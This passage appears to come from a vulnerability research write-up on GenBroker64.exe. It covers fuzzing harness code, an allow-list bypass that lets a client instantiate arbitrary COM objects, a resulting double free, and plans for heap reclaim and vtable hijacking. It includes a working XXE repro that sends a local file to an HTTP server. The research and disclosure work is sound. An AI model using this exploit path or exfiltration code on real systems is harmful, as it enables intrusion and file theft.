I ignored it, and looked for the code that manages the listening TCP socket on port 38080. I found that entry point and it was definitely written in C++ so the binary might just be a mixed of .NET & C++ 🤷🏽‍♂️. Regardless, I didn't spend time trying to understand the whys, I just started to get going on the grind instead. Reverse-engineering it, function by function, understanding more and more the various structures and software abstractions. You know how this goes. Making your Hex-Rays output pretty, having ten different variables named dunno_x and all that fun stuff.

Understanding the target

After a month of daily reverse-engineering, I was moving along, and I felt like I understood better the first order attack surfaces exposed by port 38080. It doesn't mean I understood everything going on, but I was building expertise. GenBroker64.exe appeared to be brokering conversations between a client and maybe some ICS hardware. Who knows. I had a good understanding of this layer that received custom "messages" that were made of more primitive types: strings, arrays of strings, integers, VARIANTs, etc. This layer looked like the very area Luigi attacked in 2011. I could see extra checks added here and there. I guess I was on the right track.

I was also seeing a lot of things related to the Microsoft Foundation Class (MFC) library, which I needed to familiarize myself with. Things like CArchive, ATL::CString, etc.

I started to see bugs and low-severity security issues like divisions by zero, null dereferences, infinite recursions, out-of-bounds reads, etc. Although it felt comforting for a minute, those issues were far from what I needed to pop calc remotely without user interaction. On the right track still, but no cigar. The clock was ticking, and I started to wonder if fuzzing could be helpful. The deserialization layer surface was suitable for fuzzing, and I probably could harness the target quickly thanks to the accumulated expertise. The wtf fuzzer I released a bit ago seemed like a good candidate, and so that's what I used. It's always a special feeling when a tool you wrote is solving one of your problems 🙏 The plan was to kick off some fuzzing quickly while I continued on exploring the surface manually.

Harnessing the target

The custom messages received by GenBroker64.exe are stored in a receive buffer that looks liked the following:

struct TcpRecvBuffer_t {
  TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
  uint64_t Vtbl;
  uint64_t m_hFile;
  uint64_t m_bCloseOnDelete;
  uint64_t m_strFileName;
  uint32_t m_dFoo;
  uint32_t m_pTM;
  uint64_t m_nGrowBytes;
  uint64_t m_nPosition;
  uint64_t m_nBufferSize;
  uint64_t m_nFileSize;
  uint64_t m_lpBuffer;
};

m_lpBuffer points to the raw bytes received off the socket, and so injecting the test case in memory should be straightforward. I put together a client that sent a large packet (0x1'000 bytes long) to ensure there would be enough storage in the buffer to fuzz. I took snapshot of GenBroker64.exe just after the relevant WSOCK32!recv call as you can see below:

GenBroker64+0x83dd0:
00000001`40083dd0 83f8ff          cmp     eax,0FFFFFFFFh

kd> ub .
00000001'40083dc0 4053            push    rbx
00000001'40083dc2 4883ec30        sub     rsp,30h
00000001'40083dc6 488b4908        mov     rcx,qword ptr [rcx+8]
00000001`40083dca ff15b8aa0200    call    qword ptr [GenBroker64+0xae888 (00000001`400ae888)]

kd> dqs 00000001`400ae888
00000001`400ae888  00007ffb`f27e1010 WSOCK32!recv

kd> r @rax
rax=0000000000001000

kd> kp
 # Child-SP          RetAddr               Call Site
00 00000000`0a48fb10 00000001`4008a9fc     GenBroker64+0x83dd0
01 00000000`0a48fb50 00000001`40086783     GenBroker64+0x8a9fc
02 00000000`0a48fdf0 00000001`4008609d     GenBroker64+0x86783
03 00000000`0a48fe20 00007ffc`0cd07bd4     GenBroker64+0x8609d
04 00000000`0a48ff30 00007ffc`0db0ce71     KERNEL32!BaseThreadInitThunk+0x14
05 00000000`0a48ff60 00000000`00000000     ntdll!RtlUserThreadStart+0x21

Then, I wrote a simple fuzzer module that wrote the test case at the end of the receive buffer to ensure out-of-bound memory accesses will trigger access violations when accessing the guard page behind it. I also updated the size of the amount of bytes received by recv as well as the start address (m_lpBuffer). The TcpRecvBuffer_t structure was stored on the stack. This is what the module looked like:

bool InsertTestcase(const uint8_t *Buffer, const size_t BufferSize) {
  const uint64_t MaxBufferSize = 0x1'000;
  if (BufferSize > MaxBufferSize) {
    return true;
  }

  struct TcpRecvBuffer_t {
    TcpRecvBuffer_t() { memset(this, 0, sizeof(*this)); }
    uint64_t Vtbl;
    uint64_t m_hFile;
    uint64_t m_bCloseOnDelete;
    uint64_t m_strFileName;
    uint32_t m_dFoo;
    uint32_t m_pTM;
    uint64_t m_nGrowBytes;
    uint64_t m_nPosition;
    uint64_t m_nBufferSize;
    uint64_t m_nFileSize;
    uint64_t m_lpBuffer;
  };

  static_assert(offsetof(TcpRecvBuffer_t, m_lpBuffer) == 0x48);

  //
  // Calculate and read the TcpRecvBuffer_t pointer saved on the stack.
  //

  const Gva_t Rsp = Gva_t(g_Backend->GetReg(Registers_t::Rsp));
  const Gva_t TcpRecvBufferAddr = g_Backend->VirtReadGva(Rsp + Gva_t(0x30));

  //
  // Read the TcpRecvBuffer_t structure.
  //

  TcpRecvBuffer_t TcpRecvBuffer;
  if (!g_Backend->VirtReadStruct(TcpRecvBufferAddr, &TcpRecvBuffer)) {
    fmt::print("VirtWriteDirty failed to write testcase at {}\n",
               fmt::ptr(Buffer));
    return false;
  }

  //
  // Calculate the testcase address so that it is pushed towards the end of the
  // page to benefit from the guard page.
  //

  const Gva_t BufferEnd = Gva_t(TcpRecvBuffer.m_lpBuffer + MaxBufferSize);
  const Gva_t TestcaseAddr = BufferEnd - Gva_t(BufferSize);

  //
  // Insert testcase in memory.
  //

  if (!g_Backend->VirtWriteDirty(TestcaseAddr, Buffer, BufferSize)) {
    fmt::print("VirtWriteDirty failed to write testcase at {}\n",
               fmt::ptr(Buffer));
    return false;
  }

  //
  // Set the size of the testcase.
  //

  g_Backend->SetReg(Registers_t::Rax, BufferSize);

  //
  // Update the buffer address.
  //

  TcpRecvBuffer.m_lpBuffer = TestcaseAddr.U64();
  if (!g_Backend->VirtWriteStructDirty(TcpRecvBufferAddr, &TcpRecvBuffer)) {
    fmt::print("VirtWriteDirty failed to update the TcpRecvBuffer.m_lpBuffer "
               "pointer\n");
    return false;
  }

  return true;
}

When harnessing a target with wtf, there are numerous events or API calls that can't execute properly inside the runtime environment. I/Os and context switching are a few examples but there are more. Knowing how to handle those events are usually entirely target specific. It can be as easy as nop-ing a call and as tricky as emulating the effect of a complex API. This is a tricky balancing act because you want to avoid forcing your target into acting differently than it would when executed for real. Otherwise you are risking to run into bugs that only exist in the reality you built 👾.

Thankfully, GenBroker64.exe wasn't too bad; I nop'd a few functions that lead to I/Os but they didn't impact the code I was fuzzing:

bool Init(const Options_t &Opts, const CpuState_t &) {
  //
  // Make ExGenRandom deterministic.
  //
  // kd> ub fffff805`3b8287c4 l1
  // nt!ExGenRandom+0xe0:
  // fffff805`3b8287c0 480fc7f2        rdrand  rdx
  const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
  if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
        DebugPrint("Hit ExGenRandom!\n");
        Backend->Rdx(Backend->Rdrand());
      })) {
    return false;
  }

  const uint64_t GenBroker64Base = g_Dbg.GetModuleBase("GenBroker64");
  const Gva_t EndFunct = Gva_t(GenBroker64Base + 0x85FCC);
  if (!g_Backend->SetBreakpoint(EndFunct, [](Backend_t *Backend) {
        DebugPrint("Finished!\n");
        Backend->Stop(Ok_t());
      })) {
    return false;
  }

  if (!g_Backend->SetBreakpoint(
          "combase!CoCreateInstance", [](Backend_t *Backend) {
            DebugPrint("combase!CoCreateInstance({:#x})\n",
                       Backend->VirtRead8(Gva_t(Backend->Rcx())));
            g_Backend->Stop(Ok_t());
          })) {
    return false;
  }

  const Gva_t DnsCacheIsKnownDns(0x1400794F0);
  if (!g_Backend->SetBreakpoint(DnsCacheIsKnownDns, [](Backend_t *Backend) {
        DebugPrint("DnsCacheIsKnownDns\n");
        g_Backend->SimulateReturnFromFunction(0);
      })) {
    return false;
  }

  const Gva_t CMemFileGrowFile(0x14009653B);
  if (!g_Backend->SetBreakpoint(CMemFileGrowFile, [](Backend_t *Backend) {
        DebugPrint("CMemFile::GrowFile\n");
        g_Backend->Stop(Ok_t());
      })) {
    return false;
  }

  if (!g_Backend->SetBreakpoint("KERNELBASE!Sleep", [](Backend_t *Backend) {
        DebugPrint("KERNELBASE!Sleep\n");
        g_Backend->Stop(Ok_t());
      })) {
    return false;
  }

  if (!g_Backend->SetBreakpoint("nt!MiIssuePageExtendRequest",
                                [](Backend_t *Backend) {
                                  DebugPrint("nt!MiIssuePageExtendRequest\n");
                                  g_Backend->Stop(Ok_t());
                                })) {
    return false;
  }

  //
  // Install the usermode crash detection hooks.
  //

  if (!SetupUsermodeCrashDetectionHooks()) {
    return false;
  }

  return true;
}

I crafted manually a few packets to be used as a corpus, ran it on my laptop, and finally went to bed calling it quits for the day 😴. I woke up the following day and was welcomed with a few findings. Exciting. It's like waking up early on Christmas morning, hoping to find gifts under the tree 🎄. Though, after looking at them, reality came back pretty fast. I realized that all the findings were some of the low-severity issues I mentioned earlier. Oh well, whatever; that's how it goes sometimes. I improved the corpus a little bit, and let the fuzzer drills through the code.

Pressure was building up as the deadline approached. I felt my progress was stalling, and it didn't feel good. I reverse-engineered myself enough times to know that I needed somewhat of a break to recharge my batteries a bit. What works best for me is to accomplish something easy, and measurable to get a supply of dopamine. I decided to get back to the fuzzer I had been running unsupervised.

Triaging findings

wtf doesn't know how handle I/Os, and stops when a context switch to prevent executing code from a different process. Those behaviors combined mean that the fuzzer often runs into situations that lead to a context switch to occur. In general, it is a symptom of poor harnessing because the execution of your test case is interrupted before it probably should have.

I had many of those test cases, so looking at them closely was both rewarding, and a good way to improve the fuzzing campaign. In general, this is pretty time-consuming because it highlights an area of the code you don't know much about, and you need to answer the question "how to handle it properly". Unfortunately, "debugging" test cases in wtf is basic; you have an execution trace that spans user and kernel-mode. It's usually gigabytes long so you are literally scrolling looking for a needle in a hell of a haystack 🔎.

I eventually found a very bizarre one. The execution stopped while trying to load a COM object, which triggered an I/O followed by a context switch. After looking closer, it seemed to be triggered from an area of code (I thought) I knew very well: that deserialization layer I mentioned. Another surprise was that the COM's class identifier came directly from the test case bytes... what the hell? 😮 Instantiating an arbitrary COM object? Exciting and wild I thought. I first assumed this was a bug I had introduced when harnessing or inserting the test case in memory. I built a proof-of-concept to reproduce and debug this live.. and I indeed stepped-through the code that read a class ID, and instantiated any COM object.

The code was part of mfc140u.dll, and not GenBroker64.exe which made me feel slightly better... I didn't miss it. I did miss a code-path that connected the deserialization layer to that function in mfc140u.dll. Missing something never feels great, but it is an essential part of the job. The best thing you can do is try to transform this even into a learning opportunity 🌈.

So, how did I miss this while spending so much time in this very area? The function doing the deserialization was a big switch-case statement where each case handles a specific message type. Each message is made of primitive types like strings, integers, arrays, etc. As an example, below is the function that handles the deserialization of messages with identifier 89AB:

void __fastcall PayloadReq89AB_t::ReadFromArchive(PayloadReq89AB_t *Payload, Archive_t *Archive) {
  // ...
  if ( (Archive->m_nMode & ArchiveReadMode) != 0 ) {
    Archive::ReadUint32(Archive, Payload);
    Utils::ReadVariant(&Payload->Variant1, Archive);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String1);
    Archive::ReadUint32__(Archive, Payload->pad);
    Archive::ReadUint32__(Archive, &Payload->pad[4]);
    Archive::ReadUint32__(Archive, &Payload->pad[8]);
    Archive::ReadUint32_(Archive, &Payload->pad[12]);
    Utils::ReadVariant(&Payload->Variant2, Archive);
    Utils::ReadVariant(&Payload->Variant3, Archive);
    Utils::ReadVariant(&Payload->Variant4, Archive);
    Utils::ReadVariant(&Payload->Variant5, Archive);
    Utils::ReadVariant(&Payload->Variant6, Archive);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String2);
    Archive::ReadUint32(Archive, &Payload->D0);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String3);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String4);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String5);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String6);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String7);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String8);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->String9);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringA);
    Archive::ReadUint32(Archive, &Payload->Q90);
    Utils::ReadVariant(&Payload->Variant7, Archive);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringB);
    Archive::ReadUint32(Archive, &Payload->Dunno);
  }

  // ...
}

One of the primitive types is a VARIANT. For those unfamiliar with this structure, it is used a lot in Windows, and is made of an integer that tells you how to interpret the data that follows. The type is an integer followed by a giant union:

typedef struct tagVARIANT {
  struct {
    VARTYPE vt;
    WORD    wReserved1;
    WORD    wReserved2;
    WORD    wReserved3;
    union {
      LONGLONG     llVal;
      LONG         lVal;
      BYTE         bVal;
      SHORT        iVal;
      FLOAT        fltVal;
      DOUBLE       dblVal;
      VARIANT_BOOL boolVal;
      VARIANT_BOOL __OBSOLETE__VARIANT_BOOL;
      SCODE        scode;
      CY           cyVal;
      DATE         date;
      BSTR         bstrVal;
      IUnknown     *punkVal;
      IDispatch    *pdispVal;
      SAFEARRAY    *parray;
      BYTE         *pbVal;
      SHORT        *piVal;
      LONG         *plVal;
      LONGLONG     *pllVal;
      FLOAT        *pfltVal;
      DOUBLE       *pdblVal;
      VARIANT_BOOL *pboolVal;
      VARIANT_BOOL *__OBSOLETE__VARIANT_PBOOL;
      SCODE        *pscode;
      CY           *pcyVal;
      DATE         *pdate;
      BSTR         *pbstrVal;
      IUnknown     **ppunkVal;
      IDispatch    **ppdispVal;
      SAFEARRAY    **pparray;
      VARIANT      *pvarVal;
      PVOID        byref;
      CHAR         cVal;
      USHORT       uiVal;
      ULONG        ulVal;
      ULONGLONG    ullVal;
      INT          intVal;
      UINT         uintVal;
      DECIMAL      *pdecVal;
      CHAR         *pcVal;
      USHORT       *puiVal;
      ULONG        *pulVal;
      ULONGLONG    *pullVal;
      INT          *pintVal;
      UINT         *puintVal;
      struct {
        PVOID       pvRecord;
        IRecordInfo *pRecInfo;
      } __VARIANT_NAME_4;
    } __VARIANT_NAME_3;
  } __VARIANT_NAME_2;
  DECIMAL decVal;
} VARIANT;

Utils::ReadVariant is the name of the function that reads a VARIANT from a stream of bytes, and it roughly looked like this:

void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
    TRY {
        return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
    } CATCH_ALL(e) {
        VariantClear(Variant);
    }
}

HRESULT Utils::ReadVariant_(tagVARIANT *Variant, Archive_t *Archive, int Level) {
  VARTYPE VarType = Archive.ReadUint16();
  if((VarType & VT_ARRAY) != 0) {
      // Special logic to unpack arrays..
      return ..;
  }

  Size = VariantTypeToSize(VarType);
  if (Size) {
      Variant->vt = VarType;
      return Archive.ReadInto(&Variant->decVal.8, Size);
  }

  if(!CheckVariantType(VarType)) {
      // ...
      throw Something();
  }

  return Archive >> Variant; // operator>> is imported from MFC
}

The latest Archive>>Variant statement in Utils::ReadVariant_ is actually what calls into the mfc140u module, and it is also the function that loads the COM object. I basically ignored it and thought it wouldn't be interesting 😳. Code that interacts with different subsystem and/or third-party APIs are actually very important to audit for security issues. Those components might even have been written by different people or teams. They might have had different level of scrutiny, different level of quality, or different threat models altogether. That API might expect to receive sanitized data when you might be feeding it data arbitrary controlled by an attacker. All of the above make it very likely for a developer to introduce a mistake that can lead to a security issue. Anyways, tough pill to swallow.

First, ReadVariant_ reads an integer to know what the variant holds. If it is an array, then it is handled by another function. VariantTypeToSize is a tiny function that returns the number of bytes to read based variant's type:

size_t VariantTypeToSize(VARTYPE VarType) {
  switch(VarType) {
    case VT_I1: return 1;
    case VT_UI2: return 2;
    case VT_UI4:
    case VT_INT:
    case VT_UINT:
    case VT_HRESULT:
      return 4;
    case VT_I8:
    case VT_UI8:
    case VT_FILETIME:
      return 8;
    default:
      return 0;
  }
}

It's important to note that it ignores anything that isnt't integer like (uint8_t, uint16_t, uint32_t, etc.) by returning zero. Otherwise, it returns the number of bytes that needs to be read for the variant's content. Makes sense right? If VariantTypeToSize returns zero, then CheckVariantType is used to as sanitization to only allow certain types:

bool CheckVariantType(VARTYPE VarType) {
  if((VarType & 0x2FFF) != VarType) {
    return false;
  }

  switch(VarType & 0xFFF) {
    case VT_EMPTY:
    case VT_NULL:
    case VT_I2:
    case VT_I4:
    case VT_R4:
    case VT_R8:
    case VT_CY:
    case VT_DATE:
    case VT_BSTR:
    case VT_ERROR:
    case VT_BOOL:
    case VT_VARIANT:
    case VT_I1:
    case VT_UI1:
    case VT_UI2:
    case VT_UI4:
    case VT_I8:
    case VT_UI8:
    case VT_INT:
    case VT_UINT:
    case VT_HRESULT:
    case VT_FILETIME:
      return true;
      break;
    default:
      return false;
  }
}

Only certain types are allowed, otherwise Utils::ReadVariant_ throws an exception when CheckVariantType returns false. This looked solid to me.

The first trick is how the VT_EMPTY type is handled. If one is received, VariantTypeToSize returns zero and CheckVariantType returns true, which leads us right into mfc140u's operator<< function. So what though? How do we go from sending an empty variant to instantiating a COM object? 🤔

The second trick enters the room. When utils::ReadVariant reads the variant type it consumed bytes from the stream which moved the buffer cursor forward. But the MFC's operator>> also needs to know the variant type.. do you see where this is going now? To do that, it needs to read another two bytes off the stream.. which means that we are now able to send arbitrary variant types, and bypass the allow list in CheckVariantType. Pretty cool, huh?

As mentioned earlier, MFC is a library authored and shipped by Microsoft, so there's a good chance this function is documented somewhere. After googling around, I found its source code in my Visual Studio installation (C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\atlmfc\src\mfc\olevar.cpp) and it looked like this:

CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
  LPVARIANT pSrc = &varSrc;
    ar >> pSrc->vt;

// ...
  switch(pSrc->vt) {
// ...
    case VT_DISPATCH:
    case VT_UNKNOWN: {
      LPPERSISTSTREAM pPersistStream = NULL;
      CArchiveStream stm(&ar);
      CLSID clsid;
      ar >> clsid.Data1;
      ar >> clsid.Data2;
      ar >> clsid.Data3;
      ar.EnsureRead(&clsid.Data4[0], sizeof clsid.Data4);
      SCODE sc = CoCreateInstance(clsid, NULL,
        CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
        pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
        (void**)&pSrc->punkVal);
      if(sc == E_INVALIDARG) {
        sc = CoCreateInstance(clsid, NULL,
          CLSCTX_ALL & ~CLSCTX_REMOTE_SERVER,
          pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
          (void**)&pSrc->punkVal);
      }
      AfxCheckError(sc);
      TRY {
        sc = pSrc->punkVal->QueryInterface(
          IID_IPersistStream, (void**)&pPersistStream);
        if(FAILED(sc)) {
          sc = pSrc->punkVal->QueryInterface(
            IID_IPersistStreamInit, (void**)&pPersistStream);
        }
        AfxCheckError(sc);
        AfxCheckError(pPersistStream->Load(&stm));
      } CATCH_ALL(e) {
        if(pPersistStream != NULL) {
          pPersistStream->Release();
        }
        pSrc->punkVal->Release();
        THROW_LAST();
      }
      END_CATCH_ALL
      pPersistStream->Release();
    }
    return ar;
  }
}

A class identifier is indeed read directly from the archive, and a COM object is instantiated. Although we can instantiate any COM object, it needs to implement IID_IPersistStream or IID_IPersistStreamInit otherwise the function bails. If you are not familiar with this interface, here's what the MSDN says about it:

Enables the saving and loading of objects that use a simple serial stream for their storage needs.

You can serialize such an object with Save, send those bytes over a socket / store them on the filesystem, and recreate the object on the other side with Load. The other exciting detail is that the COM object loads itself from the stream in which we can place arbitrary content (via the socket).

This seemed highly insecure so I was over the moon. I knew there would be a way to exploit that behavior although I might not find a way in time. But I was convinced there has to be a way 💪🏽.

🔥 Exploit engineering: Building Paracosme

First, I wrote tooling to enumerate available COM objects implementing either of the interfaces on a freshly installed system, and loaded them one by one. While doing that, I ran into a couple of memory safety issues that I reported to MSRC as CVE-2022-21971 and CVE-2022-21974. It turns out RTF documents (loadable via Microsoft Word) can embed arbitrary COM class IDs that get instantiated via OleLoad. Once I had a list of candidates, I moved away from automation, and started to analyze them manually.

That search didn't yield much to be honest which was disappointing. The only mildly interesting thing I found is a way to exfiltrate arbitrary files via an XXE. It was really nice because it’s 100% reliable. I loaded an older MSXML (Microsoft XML, 2933BF90-7B36-11D2-B20E-00C04F983E60), and sent a crafted XML document in the stream to exfiltrate an arbitrary file to a remote HTTP server. Maybe this trick is useful to somebody one day, so here is a repro:

#include <cinttypes>
#include <cstdint>
#include <optional>
#include <shlwapi.h>
#include <string>
#include <unordered_map>
#include <windows.h>
#pragma comment(lib, "shlwapi.lib")

std::optional<GUID> Guid(const std::string &S) {
  GUID G = {};
  if (sscanf_s(S.c_str(),
               "{%8" PRIx32 "-%4" PRIx16 "-%4" PRIx16 "-%2" PRIx8 "%2" PRIx8 "-"
               "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8 "%2" PRIx8
               "}",
               &G.Data1, &G.Data2, &G.Data3, &G.Data4[0], &G.Data4[1],
               &G.Data4[2], &G.Data4[3], &G.Data4[4], &G.Data4[5], &G.Data4[6],
               &G.Data4[7]) != 11) {
    return std::nullopt;
  }

  return G;
}

int main(int argc, char *argv[]) {
  const char *Key = "{2933BF90-7B36-11D2-B20E-00C04F983E60}";
  const auto &ClassId = Guid(Key);

  CoInitialize(nullptr);
  if (!ClassId.has_value()) {
    printf("Guid failed w/ '%s'\n", Key);
    return EXIT_FAILURE;
  }

  printf("Trying to create %s\n", Key);
  IUnknown *Unknown = nullptr;
  HRESULT Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL,
                                IID_IUnknown, (LPVOID *)&Unknown);
  if (FAILED(Hr)) {
    Hr = CoCreateInstance(ClassId.value(), nullptr, CLSCTX_ALL, IID_IDispatch,
                          (LPVOID *)&Unknown);
  }

  if (FAILED(Hr)) {
    printf("Failed CoCreateInstance %s\n", Key);
    return EXIT_FAILURE;
  }

  IPersistStream *PersistStream = nullptr;
  Hr = Unknown->QueryInterface(IID_IPersistStream, (LPVOID *)&PersistStream);
  DWORD Return = EXIT_SUCCESS;
  if (SUCCEEDED(Hr)) {
    printf("SUCCESS %s!\n", Key);
    // - Content of xxe.dtd:
    // ```
    // <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
    // <!ENTITY % root "<!ENTITY &#x25; oob SYSTEM 'http://localhost:8000/file?%payload;'>">
    // %root;
    // %oob;
    // ```
    const char S[] = R"(<?xml version="1.0"?>
<!DOCTYPE malicious [
  <!ENTITY % sp SYSTEM "http://localhost:8000/xxe.dtd">
%sp;&root;
]>))";
    IStream *Stream = SHCreateMemStream((const BYTE *)S, sizeof(S));
    PersistStream->Load(Stream);
    Stream->Release();
  }

  if (PersistStream) {
    PersistStream->Release();
  }

  Unknown->Release();
  return Return;
}

This is what it looks like when running it:

This felt somewhat like progress, but realistically it didn't get me closer to demonstrating remote code execution against the target 😒 I didn't think the ZDI would accept arbitrary file exfiltration as a way to demonstrate RCE, but in retrospect I probably should have asked. I also could have looked for an interesting file to exfiltrate; something with credentials that would allow me to escalate privileges somehow. But instead, I went to the grind.

I had been playing with the COM thing for a while now, but something big had been in front of my eyes this whole time. One afternoon, I was messing around and started loading some of the candidates I gathered earlier, and GenBroker64.exe crashed 😮

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
OLEAUT32!VarWeekdayName+0x22468:
00007ffa'e620c7f8 488b01          mov     rax,qword ptr [rcx] ds:00000000'2e5a2fd0=????????????????

What the hell, I thought? I tried it again.. and the crash reproduced.

Understanding the bug

After looking at the code closer, I started to understand what was going on. In operator>> we can see that if the Load() call throws an exception, it is caught to clean up, and Release() both pPersistStream & pSrc->punkVal ([2]). That makes sense.

CArchive& AFXAPI operator>>(CArchive& ar, COleVariant& varSrc) {
  LPVARIANT pSrc = &varSrc;
    ar >> pSrc->vt;

// ...
  switch(pSrc->vt) {
// ...
    case VT_DISPATCH:
    case VT_UNKNOWN: {
      LPPERSISTSTREAM pPersistStream = NULL;
      CArchiveStream stm(&ar);
// ...
//    [1]
      SCODE sc = CoCreateInstance(clsid, NULL,
        CLSCTX_ALL | CLSCTX_REMOTE_SERVER,
        pSrc->vt == VT_UNKNOWN ? IID_IUnknown : IID_IDispatch,
        (void**)&pSrc->punkVal);
// ...
      TRY {
        sc = pSrc->punkVal->QueryInterface(
          IID_IPersistStream, (void**)&pPersistStream);
// ...
        AfxCheckError(pPersistStream->Load(&stm));
      } CATCH_ALL(e) {
//      [2]
        if(pPersistStream != NULL) {
          pPersistStream->Release();
        }
        pSrc->punkVal->Release();
        THROW_LAST();
      }

The subtlety, though, is that the pointer to the instantiated COM object has been written into pSrc ([1]). pSrc is a reference to a VARIANT object that the caller passed. This is an important detail because Utils::ReadVariant will also catch any exceptions, and will clear Variant:

void Utils::ReadVariant(tagVARIANT *Variant, Archive_t *Archive, int Level) {
    TRY {
      return ReadVariant_((CArchive *)Archive, (COleVariant *)Variant);
    } CATCH_ALL(e) {
      VariantClear(Variant);
    }
}

Because Variant has been modified by operator>>, VariantClear sees that the variant is holding a COM instance, and so it needs to free it which leads to a double free... 🔥 Unfortunately, IDA (still?) doesn't have good support for exception handling in the Hex-Rays decompiler which makes it hard to see that logic.

This bug is interesting. I feel like the MFC operator>> could protect callers from bugs like this by NULL'ing out pSrc->punkVal after releasing it, and updating the variant type to VT_EMPTY. Or, modify pSrc only when the function is about to return a success, but not before. Otherwise it is hard for the exception handler of Utils::ReadVariant even to know if Variant needs to be cleared or not. But who knows, there might be legit reasons as to why the operator works this way 🤷🏽‍♂️ Regardless, I wouldn't be surprised if bugs like this exist in other applications 🤔. Check out paracosme-poc.py if you would like to trigger this behavior.

The planets were slowly aligning, and I was still in the game. There should be enough time to build an exploit based on what I know. Before digging into the exploit engineering, let's do a recap: - GenBroker64.exe listens on TCP:38080 and deserializes messages sent by the client - Although it tries to allow only certain VARIANT types, there is a bug. If the user sends a VT_EMPTY VARIANT, the MFC operator>> is called which will read a VARIANT off the stream. GenBroker64.exe doesn't rewind the stream so the MFC reads another VARIANT type that doesn't go through the allow list. This allows to bypass the allow list and have the MFC instantiate an arbitrary COM object. - If the COM object throws an exception while either the QueryInterface or Load method is called, the instantiated COM object will be double-free'd. The second free is done by VariantClear, which internally calls the object's virtual Release method.

If we can reclaim the freed memory after the first free but before VariantClear, then we control a vtable pointer, and as a result hijack control flow 💥.

Let's now work on engineering planet alignments 💫.

Can I reclaim the chunk with controlled data?

I had a lot of questions but the important ones were:

Can I run multiple clients at the same time, and if so, can I use them to reclaim the memory chunk?
Is there any behavior in the heap allocator that prevents another thread from reclaiming the chunk?
Assuming I can reclaim it, can I fill it with controlled data?

To answer the first two questions, I ran GenBroker64.exe under a debugger to verify that I could execute other clients while the target thread was frozen. While doing that, I also confirmed that the freed chunk can be reclaimed by another client when the target thread is frozen right after the first free.

The third question was a lot more work though. I first looked into leveraging another COM object that allowed me to fill the reclaimed chunk with arbitrary content via the Load method. I modified the tooling I wrote to enumerate and find suitable candidates, but I eventually walked away. Many COM objects used a different allocator or were allocating off a different heap, and I never really found one that allowed me to control as much as I wanted off the reclaimed chunk.

I moved on, and started to look at using a different message to both reclaim and fill the chunk with controlled content. The message with the id 0x7d0 exactly fits the bill: it allows for an allocation of an arbitrary size and lets the client fully control its content which is perfect 👌🏽. The function that deserializes this message allocates and fills up an array of arbitrary size made of 32-bit integers, and this is what it looks like:

void __fastcall PayloadReq7D0_t::ReadFromArchive(PayloadReq7D0_t *Payload, Archive_t *Archive) {
// ...
  if ( (Archive->m_nMode & ArchiveReadMode) != 0 )
  {
    Archive::ReadString((CArchive *)Archive, (CString *)Payload);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->ProgId);
    Archive::ReadString((CArchive *)Archive, (CString *)&Payload->StringC);
    Archive::ReadUint32_(Archive, &Payload->qword18);
    Archive::ReadUint32_(Archive, &Payload->BufferSize);
    BufferSize = Payload->BufferSize;
    if ( BufferSize )
    {
      Buffer = calloc(BufferSize, 4ui64);
      Payload->Buffer = Buffer;
      if ( Buffer )
      {
        for ( i = 0i64; (unsigned int)i < Payload->BufferSize; Archive->m_lpBufCur += 4 )
        {
          Entry = &Payload->Buffer[i];
// ...
          *Entry = *(_DWORD *)m_lpBufCur;
        }
// ...

Hijacking control flow & ROPing to get arbitrary native code execution

Once I identified the right memory primitives, then hijacking control flow was pretty straightforward. As I mentioned above, VariantClear reads the first 8 bytes of the object as a virtual table. Then, it reads off this virtual table at a specific offset and dispatches an indirect call. This is the assembly code with @rcx pointing to the variant that we reclaimed and filled with arbitrary content:

0:011> u . l3
OLEAUT32!VariantClear+0x20b:
00007ffb'0df751cb mov     rax,qword ptr [rcx]
00007ffb'0df751ce mov     rax,qword ptr [rax+10h]
00007ffb`0df751d2  call    qword ptr [00007ffb`0df82660]

0:011> u poi(00007ffb`0df82660)
OLEAUT32!SetErrorInfo+0xec0:
00007ffb`0deffd40  jmp     rax

The first instruction reads the virtual table address into @rax, then the Release virtual method address is read at offset 0x10 from the table, and finally, Release is called via an indirect call. Imagine that the below is the content of the reclaimed variant object:

0x11111111'11111111
0x22222222'22222222
0x33333333'33333333

Execution will be redirected to [[0x11111111'11111111] + 0x10] which means:

0x11111111'11111111 needs to be an address that points somewhere readable in the address space to not crash,
At the same time, it needs to be pointing to another address (to which is added the offset 0x10) that will point to where we want to pivot execution.

I was like, ugh, this constrained call primitive is a bit annoying 😒. Another crucial piece that we haven't brought up yet is... ASLR. But fortunately for us, the main module GenBroker64.exe isn't randomized but the rest of the address space is. Technically this is false because GenClient64.dll wasn't randomized either but I quickly ditched it as it was tiny and uninteresting. The only option for us is to use gadgets from GenBroker64.exe only because we do not have a way to leak information about the target's address space. On top of that, the used-after-free object is 0xc0 bytes long which didn't give us a lot of room for a ROP chain (at best 0xc0 / 8 = 24 slots).

